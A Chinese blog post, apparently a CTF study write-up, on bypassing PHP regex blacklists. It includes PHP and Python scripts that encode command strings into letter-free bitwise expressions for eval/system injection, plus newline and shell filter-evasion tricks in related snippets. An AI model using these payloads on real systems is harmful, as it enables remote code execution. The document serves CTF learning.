【Flag】-PHP-正则绕过

最新推荐文章于 2024-03-26 18:05:40 发布
最新推荐文章于 2024-03-26 18:05:40 发布
阅读量2k 收藏 8
点赞数 3
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/120052124
版权
本文详细介绍了字符集合、位运算在PHP和Python中的应用,用于绕过正则表达式限制。作者通过实例展示了如何使用位运算生成特定字符串,如phpinfo,并提供了PHP和Python的脚本。同时,文中还提到了字符插入、测试靶场及反思,强调了字符变换在解决CTF挑战中的实用性和乐趣。
摘要由CSDN通过智能技术生成

文章目录

最近RCTF分站赛要开始了,梳理一些知识。梳理的过程中可能会怀疑 字符变换 的实用性,我个人难以避免,但即使是不打CTF,细致地观察和演练字符集,想必本身就是一件幸福地事吧。唯一要注意的点,不要为了做题去看/观察/揣摩,把它看作一个挑战和游戏,或者说字符集研究的一部分。

字符集合

通用字符集合

结合题目calc的黑名单进行梳理:

总字符regexp黑名单 /im模式
字母[a-z]× 不可用
数字[0-9]√ 可用
8种运算符只有 ^ 不可用
3种比较符
3个引号×
3个括号分隔符只有 [] 不可用
3个句子分隔符只有 , 不可用
转义符\×
常见3个注释符
所有空白符\s空格、制表符、换页符等等都不可用
换行和tab
扩展ascii编码 [\x7f-\xff]×
PHP符号regexp黑名单 /im模式
变量符×
下划线×

在这里插入图片描述

32个不可打印字符和转义字符

Url编码和Ascii编码的关系
Url编码是Ascii编码的十六进制格式,加上一个标识符 %。这里针对Ascii的 [0-31 ]不可打印字符,以Url编码的格式进行展开。

所有的ASCII码都可以用 \ 加数字(一般是8进制数字)来表示,如果 % 在黑名单里,可以尝试使用Ascii码的八进制格式。

重点字符十进制用途
%000C语言的字符串结束符号,在PHP中可以使用00截断过check
%099水平制表符,一般等价表示为 \t ,默认显示4或8个空格,替换空格
%0a10换行键,一般等价表示为 \n ,在PHP中可以插入换行过check
%0b11垂直制表符
%0c12换页键
%0d13回车键

转义字符

C语言定义了一些字母前加 \ 来表示常见的那些不能显示的ASCII字符,如\0,\t,\n等,就称为转义字符,因为后面的字符,都不是它本来的ASCII字符意思了。

一般情况下,在后台编程时使用 转义字符 ,在 Web 端当然使用 Url 编码,所以过check以 Url 编码的不可见字符为主。

正则表达式的 \s 是指空白,包括空格、换行、tab缩进等所有的空白。

0x01 位运算

基本概念

参考 异或运算怎么算_位运算

位运算是直接对整数在内存中的二进制位进行操作,由于位运算直接对内存数据进行操作,无需转成十进制,因此使用位运算的处理速度是很快的。

基本的位运算有与、或、异或、取反、左移、右移这6种。

6个基本位运算-
与 &只有当两位都是 1 时结果才是 1,否则为 0
|顾名思义
异或 ^两个位相同则为 0,不同则为 1
取反 ~0 则变为 1,1 则变为 0
左移 <<扩大2的n次方
右移 >>缩小2的n次方

PHP字符变换(绕过正则)

1. 与运算和或运算(无字母,用到数字)

参考 RCTF2020 复现RCTF 2020 Writeup
参考 无字母数字webshell之提高篇

流程图

在这里插入图片描述
流程图代码

graph LR
A1[整数1/0]
A2[整数0]
B[字符串 INF1]
A1-->|小括号和连接符.|B
A2-->|小括号|B
C[字母 I]
B-->|大括号截取字符串首位|C
D[指定字符组合如phpinfo]
C-->|与运算和或运算|D
生成指定字符串的PHP脚本(payload无效)(更正:有效)

本地测试用例,操作系统Win,版本使用php7.0.9和7.1.9

通过本地测试和 buu 题目测试,发现该脚本生成的payload无法执行。(要把phpinfo生成的字符串用()包含,如使用(result)()进行URL编码则能成功执行)

输入命令落脚函数结果
whoami@eval"(system(".$payload.");" )执行成功
whoami)@eval(“system(”.$payload.";")没有解析 ) ,报语法错误
phpinfo();@eval($payload)语法错误unexpected end of file
(phpinfo)();@eval($payload)要手动加()()才会执行成功
对照测试@eval("(phpinfo)();");执行成功,推测转换脚本有问题

经过测试,发现该 PHP 脚本目前转换 () 可能有误,但可以成功转换 [a-z]。(更正:脚本无误,可以执行成功)

<?php
$cmd = "phpinfo";#要运行的命令

# $cmd = "whoami";              # 构造payload="whoami",成功执行whoami
# $cmd = "whoami);";            # 构造payload="whoami);",报语法错误,unexpected end of file, expecting ',' or ')'
# $cmd = "whoami)";             # 构造payload="whoami)",仍报错,说明payload的 ) 没有被解析
# $cmd = "(phpinfo)();";        # 构造payload="(phpinfo)();",仍报错,推测脚本对 () 的转换可能有误
$fin="";
$tables=
    [
        "9" => "(((9).(0)){0})",
        "8" => "(((8).(0)){0})",
        "7" => "(((7).(0)){0})",
        "6" => "(((6).(0)){0})",
        "5" => "(((5).(0)){0})",
        "4" => "(((4).(0)){0})",
        "3" => "(((3).(0)){0})",
        "2" => "(((2).(0)){0})",
        "1" => "(((1).(0)){0})",
        "0" => "(((0).(0)){0})",
        "~" => "((((0).(0)){0})|(((0/0).(0)){0}))",
        "}" => "((((4).(0)){0})|(((1/0).(0)){0}))",
        "|" => "((((4).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
        "{" => "((((2).(0)){0})|(((1/0).(0)){0}))",
        "z" => "((((2).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
        "y" => "((((0).(0)){0})|(((1/0).(0)){0}))",
        "x" => "((((0).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
        "w" => "((((1).(0)){0})|(((1/0).(0)){2}))",
        "v" => "((((0).(0)){0})|(((1/0).(0)){2}))",
        "u" => "((((4).(0)){0})|(((0/0).(0)){1}))",
        "t" => "((((4).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "s" => "((((2).(0)){0})|(((0/0).(0)){1}))",
        "r" => "((((2).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "q" => "((((0).(0)){0})|(((0/0).(0)){1}))",
        "p" => "((((0).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "o" => "((((0/0).(0)){0})|(((-1).(1)){0}))",
        "n" => "((((0/0).(0)){0})|((((4).(0)){0})&(((-1).(1)){0})))",
        "m" => "((((0/0).(0)){1})|(((-1).(1)){0}))",
        "l" => "(((((0).(0)){0})|(((0/0).(0)){0}))&((((0/0).(0)){1})|(((-1).(1)){0})))",
        "k" => "(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "j" => "(((((0).(0)){0})|(((0/0).(0)){0}))&(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0}))))",
        "i" => "((((0/0).(0)){1})|((((8).(0)){0})&(((-1).(1)){0})))",
        "h" => "(((((8).(0)){0})&(((-1).(1)){0}))|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "g" => "((((1/0).(0)){2})|((((1).(0)){0})&(((-1).(1)){0})))",
        "f" => "((((1/0).(0)){2})|((((4).(0)){0})&(((-1).(1)){0})))",
        "e" => "((((0/0).(0)){1})|((((4).(0)){0})&(((-1).(1)){0})))",
        "d" => "(((((0).(0)){0})|(((1/0).(0)){2}))&((((0/0).(0)){1})|(((-1).(1)){0})))",
        "c" => "(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "b" => "(((((0).(0)){0})|(((0/0).(0)){0}))&(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((-1).(1)){0}))))",
        "a" => "((((0/0).(0)){1})|((((1).(0)){0})&(((-1).(1)){0})))",
        "`" => "(((((0).(0)){0})|(((0/0).(0)){0}))&((((0/0).(0)){1})|((((1).(0)){0})&(((-1).(1)){0}))))",
        "O" => "((((0/0).(0)){0})|(((0/0).(0)){1}))",
        "N" => "(((0/0).(0)){0})",
        "M" => "(((((4).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "L" => "((((0/0).(0)){0})&((((4).(0)){0})|(((1/0).(0)){0})))",
        "K" => "(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "J" => "((((0/0).(0)){0})&((((2).(0)){0})|(((1/0).(0)){0})))",
        "I" => "(((1/0).(0)){0})",
        "H" => "((((0/0).(0)){0})&(((1/0).(0)){0}))",
        "G" => "((((0/0).(0)){1})|(((1/0).(0)){2}))",
        "F" => "(((1/0).(0)){2})",
        "E" => "(((((4).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "D" => "((((0/0).(0)){0})&((((4).(0)){0})|(((0/0).(0)){1})))",
        "C" => "(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "B" => "((((0/0).(0)){0})&((((2).(0)){0})|(((0/0).(0)){1})))",
        "A" => "(((0/0).(0)){1})",
        "@" => "((((0/0).(0)){0})&(((0/0).(0)){1}))",
        "?" => "((((2).(0)){0})|(((-1).(1)){0}))",
        ">" => "((((6).(0)){0})|(((8).(0)){0}))",
        "=" => "((((0).(0)){0})|(((-1).(1)){0}))",
        "<" => "((((4).(0)){0})|(((8).(0)){0}))",
        ";" => "((((2).(0)){0})|(((9).(0)){0}))",
        ":" => "((((2).(0)){0})|(((8).(0)){0}))",
        "/" => "(((((2).(0)){0})|(((-1).(1)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "." => "(((((6).(0)){0})|(((8).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "-" => "(((-1).(1)){0})",
        "," => "((((-1).(1)){0})&((((0).(0)){0})|(((0/0).(0)){0})))",
        "+" => "(((((2).(0)){0})|(((9).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "*" => "(((((2).(0)){0})|(((8).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        ")" => "((((9).(0)){0})&(((-1).(1)){0}))",
        "(" => "((((8).(0)){0})&(((-1).(1)){0}))",
        "'" => "((((7).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "&" => "((((6).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "%" => "((((5).(0)){0})&(((-1).(1)){0}))",
        "$" => "((((4).(0)){0})&(((-1).(1)){0}))",
        "#" => "((((3).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        '"' => "((((2).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "!" => "((((1).(0)){0})&(((-1).(1)){0}))"
    ];
for($i=0;$i<strlen($cmd);$i++) {
    $fin = $fin.$tables[$cmd[$i]].'.';
}
echo substr($fin,0,strlen($fin)-1)."\n";
$payload = substr($fin,0,strlen($fin)-1);

# @eval("system(".$payload.");");   # 执行成功,传入字符串 whoami
# @eval("system(".$payload);        # 执行失败,传入字符串 whoami);
# @eval("system(".$payload.";");    # 执行失败,传入字符串 whoami)

# 对照测试
# @eval("(phpinfo)();");            # 执行成功
# @eval($payload);                  # 执行失败,传入字符串 (phpinfo)();
?>
生成指定字符串的Python脚本(自己编写)

花费一下午时间,自己逐步梳理测试编写了一个Python脚本来完成 字符变换 ,起因是测试PHP脚本发现不对,直到写完Python脚本后发现,执行动态函数需要用 () 把生成的payload包含起来。

把编写的Python脚本保存到脚本库。

# -*- coding:utf-8 -*-

from urllib import parse    # URL编码

# 原始字符
origin_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'I', 'N', 'F']     # 原始字符

origin_ascii = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 73, 78, 70]                 # 方便计数,可有可无

origin_dic = {                  # 第一层映射关系
    '0': "((1/0).(0)){3}",	    # '0'属于二级表示,最终都要转换成可打印字符的一级表示
    '1': "((1/0).(1)){3}",
    '2': '((1/0).(2)){3}',
    '3': '((1/0).(3)){3}',
    '4': '((1/0).(4)){3}',
    '5': '((1/0).(5)){3}',
    '6': '((1/0).(6)){3}',
    '7': '((1/0).(7)){3}',
    '8': '((1/0).(8)){3}',
    '9': '((1/0).(9)){3}',
    'I': '((1/0).(0)){0}',
    'N': '((1/0).(0)){1}',
    'F': '((1/0).(0)){2}',
}


# 逐步收集ascii可打印字符和相对的映射关系

result_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'I', 'N', 'F']

result_ascii = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 73, 78, 70]                 # 方便计数

result_dic = {
    '0': "((1/0).(0)){3}",
    '1': "((1/0).(1)){3}",
    '2': '((1/0).(2)){3}',
    '3': '((1/0).(3)){3}',
    '4': '((1/0).(4)){3}',
    '5': '((1/0).(5)){3}',
    '6': '((1/0).(6)){3}',
    '7': '((1/0).(7)){3}',
    '8': '((1/0).(8)){3}',
    '9': '((1/0).(9)){3}',
    'I': '((1/0).(0)){0}',
    'N': '((1/0).(0)){1}',
    'F': '((1/0).(0)){2}',
}


# 最终生成的映射字典,有47个键,数字字母26+10=36个,还有11个是:运算符~|   分隔符:;{}?@ 比较符<>=
final_dic = {
    '0': '((1/0).(0)){3}',
    '1': '((1/0).(1)){3}',
    '2': '((1/0).(2)){3}',
    '3': '((1/0).(3)){3}',
    '4': '((1/0).(4)){3}',
    '5': '((1/0).(5)){3}',
    '6': '((1/0).(6)){3}',
    '7': '((1/0).(7)){3}',
    '8': '((1/0).(8)){3}',
    '9': '((1/0).(9)){3}',
    'I': '((1/0).(0)){0}',
    'N': '((1/0).(0)){1}',
    'F': '((1/0).(0)){2}',
    'y': '(((1/0).(0)){3})|(((1/0).(0)){0})',
    '~': '(((1/0).(0)){3})|(((1/0).(0)){1})',
    'v': '(((1/0).(0)){3})|(((1/0).(0)){2})',
    'w': '(((1/0).(1)){3})|(((1/0).(0)){2})',
    ':': '(((1/0).(2)){3})|(((1/0).(8)){3})',
    ';': '(((1/0).(2)){3})|(((1/0).(9)){3})',
    '{': '(((1/0).(2)){3})|(((1/0).(0)){0})',
    '<': '(((1/0).(4)){3})|(((1/0).(8)){3})',
    '=': '(((1/0).(4)){3})|(((1/0).(9)){3})',
    '}': '(((1/0).(4)){3})|(((1/0).(0)){0})',
    '>': '(((1/0).(4)){3})|((((1/0).(2)){3})|(((1/0).(8)){3}))',
    '?': '(((1/0).(4)){3})|((((1/0).(2)){3})|(((1/0).(9)){3}))',
    'O': '(((1/0).(0)){0})|(((1/0).(0)){1})',
    'H': '(((1/0).(0)){0})&(((1/0).(0)){1})',
    '@': '(((1/0).(0)){0})&(((1/0).(0)){2})',
    'A': '(((1/0).(0)){0})&((((1/0).(1)){3})|(((1/0).(0)){2}))',
    'J': '(((1/0).(0)){1})&((((1/0).(2)){3})|(((1/0).(0)){0}))',
    'L': '(((1/0).(0)){1})&((((1/0).(4)){3})|(((1/0).(0)){0}))',
    'B': '(((1/0).(0)){2})&((((1/0).(2)){3})|(((1/0).(0)){0}))',
    'D': '(((1/0).(0)){2})&((((1/0).(4)){3})|(((1/0).(0)){0}))',
    'x': '((((1/0).(0)){3})|(((1/0).(0)){0}))&((((1/0).(0)){3})|(((1/0).(0)){1}))',
    'p': '((((1/0).(0)){3})|(((1/0).(0)){0}))&((((1/0).(0)){3})|(((1/0).(0)){2}))',
    'q': '((((1/0).(0)){3})|(((1/0).(0)){0}))&((((1/0).(1)){3})|(((1/0).(0)){2}))',
    'z': '((((1/0).(0)){3})|(((1/0).(0)){1}))&((((1/0).(2)){3})|(((1/0).(0)){0}))',
    '|': '((((1/0).(0)){3})|(((1/0).(0)){1}))&((((1/0).(4)){3})|(((1/0).(0)){0}))',
    'r': '((((1/0).(0)){3})|(((1/0).(0)){2}))&((((1/0).(2)){3})|(((1/0).(0)){0}))',
    't': '((((1/0).(0)){3})|(((1/0).(0)){2}))&((((1/0).(4)){3})|(((1/0).(0)){0}))',
    's': '((((1/0).(1)){3})|(((1/0).(0)){2}))&((((1/0).(2)){3})|(((1/0).(0)){0}))',
    'u': '((((1/0).(1)){3})|(((1/0).(0)){2}))&((((1/0).(4)){3})|(((1/0).(0)){0}))',
    'G': '((((1/0).(1)){3})|(((1/0).(0)){2}))&((((1/0).(0)){0})|(((1/0).(0)){1}))',
    'K': '((((1/0).(2)){3})|(((1/0).(0)){0}))&((((1/0).(0)){0})|(((1/0).(0)){1}))',
    'C': '((((1/0).(2)){3})|(((1/0).(0)){0}))&(((((1/0).(1)){3})|(((1/0).(0)){2}))&((((1/0).(0)){0})|(((1/0).(0)){1})))',
    'M': '((((1/0).(4)){3})|(((1/0).(0)){0}))&((((1/0).(0)){0})|(((1/0).(0)){1}))',
    'E': '((((1/0).(4)){3})|(((1/0).(0)){0}))&(((((1/0).(1)){3})|(((1/0).(0)){2}))&((((1/0).(0)){0})|(((1/0).(0)){1})))',


}

# 通过原始字符的或运算,收集其它字符的映射关系
def huo(result_list, result_dic, result_ascii):
    # 经检查,没问题
    for s in result_list:
        for s1 in result_list:
            data = chr(ord(s) | ord(s1))    # 计算
            if (data not in result_list) and (ord(data) < 127) and (ord(data) > 31) and (ord(data) not in result_ascii):

                # 打印键值,即一级表示
                for name in result_dic.keys():
                    if s == name:
                        temp = "(" + result_dic[name] + ")|"

                for name in result_dic.keys():
                    if s1 == name:
                        temp += "(" + result_dic[name] + ")"
                result_dic[data] = temp


                result_ascii.append(ord(data))
                result_list.append(data)


def yu(result_list, result_dic, result_ascii):
    # 通过原始字符的或运算,收集其它字符的映射关系
    for s in result_list:
        for s1 in result_list:
            data = chr(ord(s) & ord(s1))
            if (data not in result_list) and (ord(data) < 127) and (ord(data) > 31) and (ord(data) not in result_ascii):

                # 打印键值,即一级表示
                for name in result_dic.keys():
                    if s == name:
                        temp = "(" + result_dic[name] + ")&"

                for name in result_dic.keys():
                    if s1 == name:
                        temp += "(" + result_dic[name] + ")"
                result_dic[data] = temp
                result_dic[data] = temp  # 把映射关系添加到字典
                # print(data, result_dic[data])
                # print()

                result_ascii.append(ord(data))
                result_list.append(data)


def show_letters(result_asicii):        # 查看当前已建立的映射关系中,有哪些字母
    result_ascii.sort()

    for x in result_ascii:
        if (x>64 and x<91) or (x>96 and x<123):
            print(chr(x), end=" ")


def show_dic(result_dic):
    for x in result_dic.keys():
        print("'" + x + "': ", end="")
        print("'" + result_dic[x], end="',")
        print()


def trans(cmd_string, final_dic):
    result = ""
    print(cmd_string)
    for single in cmd_string:
        for name in final_dic.keys():

            if single == name or ord(single)-32 == ord(name):
                result += "(" + final_dic[name] + ")."

    return result.strip(".")


if __name__ == "__main__":
    # huo(result_list, result_dic, result_ascii)    # 测试发现,输入原始字符集,通过或运算只能从13扩充到26
    # yu(result_list, result_dic, result_ascii)     # 再使用与运算,扩充到47个字符的映射关系
    cmd = "phpinfo"
    result = trans(cmd, final_dic)
    print(result)
    print(parse.quote(result))                      # 执行成功

'''
测试成功,成功执行(phpinfo)()

遇到的bug:
(1)运算符的执行顺序问题。在每次执行运算时,为运算符左右两边的表达式添加小括号。
(2)执行动态函数的格式:(phpinfo)(),所以要想执行phpinfo,还要对result进行处理:(result)()
(3)URL编码:浏览器会对非数字字母的字符进行URL编码,而hackbar和url地址栏提交会跳过浏览器,所以要自行URL编码。
'''
Python脚本编写过程

1.准备原始字符

# 原始字符
origin_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'I', 'N', 'F']     # 原始字符

ascii_origin = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 73, 78, 70]                 # 方便计数,可有可无

origin_dic = {}                  # 第一层映射关系

# 逐步收集ascii可打印字符和相对的映射关系

result_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'I', 'N', 'F']     

ascii_result = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 73, 78, 70]                 # 方便计数

result_dic = {}

2.使用原始字符进行或运算 | ,把新得到的字符添加到列表,并把 映射关系 添加到字典。再进行与运算 &。此时发现字典里有47个字符,查看是否包含26个字母,如果不区分大小写则字母齐全。

3.输入指定字符串,把其转换成无字母的字符串。

4.测试:对result进行URL编码,然后payload=(result)(),执行成功。

2. 异或(无数字和字母)

一些不包含数字和字母的webshell - Phith0n师傅

3. 取反(无数字和字母,需要汉字)

一些不包含数字和字母的webshell - Phith0n师傅

PHP命名规范之一:变量名称必须以字母或下划线开头,参考 php对变量命名的规范

0x02字符插入

0x03

0x04 落脚函数

0x05 测试靶场

正则绕过总结

1.[RoarCTF 2019]Easy Calc,主要check源码如下

$str = $_GET['num'];
    $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . "/im", $str)) {
            die("what are you want to do?");
        }
    }
    @eval('echo '.$str.';');

2.表达式:preg_match(’/^flag$/i’, $c) && $c !== ‘flag’)
翻译:字符要以 flag 开头 和(还是或)结尾,但不能强等于 flag
本地测试绕过:$c=flag%0a

0x04 反思

参考

RCTF2020 复现

RCTF 2020 Writeup

一些不包含数字和字母的webshell - Phith0n师傅

无字母数字webshell之提高篇

区块链市场观察家
关注
专栏目录
PHP正则绕过解析
qq_56845076的博客
08-03 1285
PHP的回溯,和NULL与False比较
php常用绕正则姿势
zhwho的博客
07-14 925
异或绕过 接上篇正则表达式,如果出现这样的正则: if (!preg_match('/[a-z 0-9]/is',$_GET['a'])) { eval($_GET['a']); } else{ echo "hacker"; } 即get传参的a变量中不能有数字和字母,但如果想拿到shell就要传入类似eval($_POST[‘shell’])的语句,但这时字母被禁,只能通过其他方式来构造类似的语句,这里就可以用异或规则来绕过。 先介绍下什么是异或,举个例子: 字符:? ASCII码
php正则绕过
Hammers_12的博客
09-07 1545
一、空格正则绕过: ${IFS} 但不能写作 $IFS $IFS$9 %09 <> < 二、 在PHP中,在正则绕过时可以利用\包裹住被过滤的函数,以此达到绕过的目的。例如: cat 进黑名单,用 c\a\t 绕过 空格进黑名单,用 ${IFS} 或者 %09 绕过 ✳ 和 flag 都被过滤,用和 ✳ 差不多的 ? 绕过,即 ???,获取四位的 flag ...
php 绕过 正则,Bugku | 数字验证正则绕过
weixin_28949937的博客
03-23 331
语法:int preg_match_all (字符串$ pattern ,字符串$ subject [,数组和$ matches [,整数$ flags = PREG_PATTERN_ORDER [,整数$ offset = 0 ]]] )搜索主题中所有匹配模式给定正则表达式的匹配结果并将它们以标志指定顺序输出到匹配中。在第一个匹配找到后,子序列继续从最后一次匹配位置搜索。参数说明:$ patte...
php 绕过 正则,数字验证正则绕过
weixin_36372094的博客
03-23 1016
Bugkuctf题库中的一道代码审计题,通过利用各种正则匹配函数特性最终得到flag源代码如下:12345678910111213141516171819202122232425262728293031
命令执行中关于PHP正则表达式的一些绕过方法
qq_45521281的博客
04-21 7512
最近做了buuctf上的[极客大挑战 2019]RCE ME,PHP正则的一些绕过方法也终于要用上了,原文地址:https://blog.csdn.net/mochu7777777/article/details/104631142 参考: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html https://w...
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 557
正则表达式的学习
正则表达式绕过案例
cao_bo的博客
07-29 543
正则表达式绕过案例
正则表达式密码策略与正则回溯机制绕过
Miracle_ze的博客
07-20 348
正则表达式与回溯绕过机制
sql注入绕过正则表达式匹配和回溯机制
weixin_54246834的博客
07-23 893
有限状态自动机”,其拥有有限数量的状态,每个状态可以迁移到零个或多个状态,输入字串决定执行哪个状态的迁移。而常见的正则引擎,又被细分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)。他们匹配输入的过程分别是DFA从起始状态开始,一个字符一个字符地读取输入串,并根据正则来一步步确定至下一个转移状态,直到匹配不上或走完整个输入NFA从起始状态开始,一个字符一个字符地读取输入串,并与正则表达式进行匹配,如果匹配不上,则进行回溯,尝试其他状态。...
21-3 PHP反序列化漏洞-魔术方法绕过
weixin_43263566的博客
01-17 657
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在反序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客大挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
php绕过正则表达式,关于php:通过跳过锚标记来检查正则表达式
weixin_42151305的博客
03-27 295
我已经写了一个用于搜索特定关键字的正则表达式,并用特定的URL替换了该关键字。我当前的正则表达式为:\b$keyword\b其中的一个问题是,如果我的数据包含锚标记,而该标记包含此关键字,则此正则表达式也会替换锚标记中的该关键字。我想搜索给定的数据,但锚标记除外。 请帮帮我。 感谢您的帮助。例如。 关键字:迪士尼I / P:This is Disney The disney should be...
一些CTF中php可利用的函数和一些正则表达式绕过方法
m0_75066605的博客
03-26 1478
整理的一些CTF中php可利用的函数和一些正则表达式绕过方法
正则回溯php 绕过,PHP利用PCRE回溯次数绕过某些安全限制 | 码农网
weixin_33268205的博客
03-25 384
这次Code-Breaking Puzzles中我出了一道看似很简单的题目 pcrewaf ,将其代码简化如下:function is_php($data){return preg_match('/].*/is', $data);}if(!is_php($input)) {// fwrite($f, $input); ...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。...
php 正则 回溯,PHP正则匹配绕过
weixin_33185844的博客
03-10 686
之前没有从机制上去了解过PHP正则匹配绕过具体是怎么一回事,于是主动去网上找了一些资料来加深理解NFA与正则表达式常见的正则引擎,被细分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)。由于NFA的执行过程存在回溯,所以其性能会劣于DFA,但它支持更多功能。大多数程序语言都使用了NFA作为正则引擎,其中也包括PHP使用的PCRE库。所以这里详细介绍一下NFA(Nondetermi...
php 正则 回溯,preg_match正则最大回溯以及preg_match函数的绕过
weixin_34195649的博客
03-10 1329
先提出一段代码,是i春秋上面的移到ctf题目的代码,也是需要我们绕过的代码:function areyouok($greeting){return preg_match('/Merry.*Christmas/is',$greeting);}$greeting=@$_POST['greeting'];if(!areyouok($greeting)){if(strpos($greeting,'Merr...
Linux系统下绕过某个关键字的小技巧,比如flag关键字
weixin_44632787的博客
07-24 2164
Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字 首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag! 这里提供几个绕过某个关键字的小技巧。 单引号绕过: cat fla’g’.txt 双引号绕过: cat fla"g".txt 反斜线绕过: cat f\lag.txt $+数字绕过: cat fl$1ag.txt,cat fl$2ag.txt,cat fl$3ag.txt $@绕过: cat fl$@ag.txt Base6
PHP正则回溯溢出绕过
shiyingai
09-22 398
PHP正则绕过案例代码分析EXP 案例代码 <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is',$data); } if(empty($_FILES)) { die(show_source(__FILE__)) ; } $user_dir = './data/'; $data = file_get_contents($_FIL
正则绕过总结
qq_40327508的博客
09-28 7906
换行符绕过(%0a) <?php include("flag.php"); highlight_file(__FILE__); $c = $_GET['c']; if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag; }else{ echo "nonono"; } 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%5c绕过 <?ph.
if(!preg_match("/ls|cat|flag| |base|\?|\*|\'|\"|\||\\\\/i", $cmd))如何绕过
最新发布
07-04
这个代码片段是一个 PHP 函数,它使用 `preg_match` 函数和正则表达式来检查 `$cmd` 变量中是否包含某些特定字符或命令。如果 `$cmd` 包含 "ls"、"cat"、"flag"、空格、"base"、问号、星号、单引号、双引号、管道符(|)或反斜杠(\\),该表达式会返回真(非零值),否则返回假(0)。 正则表达式 `/ls|cat|flag| |base|\?|\*|\'|\"|\||\\\\/i` 中: - `i` 表示匹配模式为不区分大小写。 - `ls`、`cat`、`flag` 是单独列出的字符串。 - `|` 表示“或”操作,匹配列表中的任何一个。 - ` `、`\?`、`\*`、`\'`、`\"` 分别匹配空格、问号、星号、单引号和双引号。 - `|\` 和 `\` 是转义后的管道符和反斜杠,用于匹配它们自身。 如果你想绕过这个检查,你需要找到一种方法使 `preg_match` 返回 false,即不在上述的字符串列表中添加新的字符,也不使用正则表达式匹配项中的特殊字符。这通常意味着避免直接使用这些关键词和特殊符号,同时注意大小写的敏感性(如果你的代码对大小写敏感)。 但是,请注意,绕过这种检查可能违反了程序的安全策略,可能导致恶意行为或代码注入攻击。在实际应用中,你应该只接受预定义的行为或者经过验证的输入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值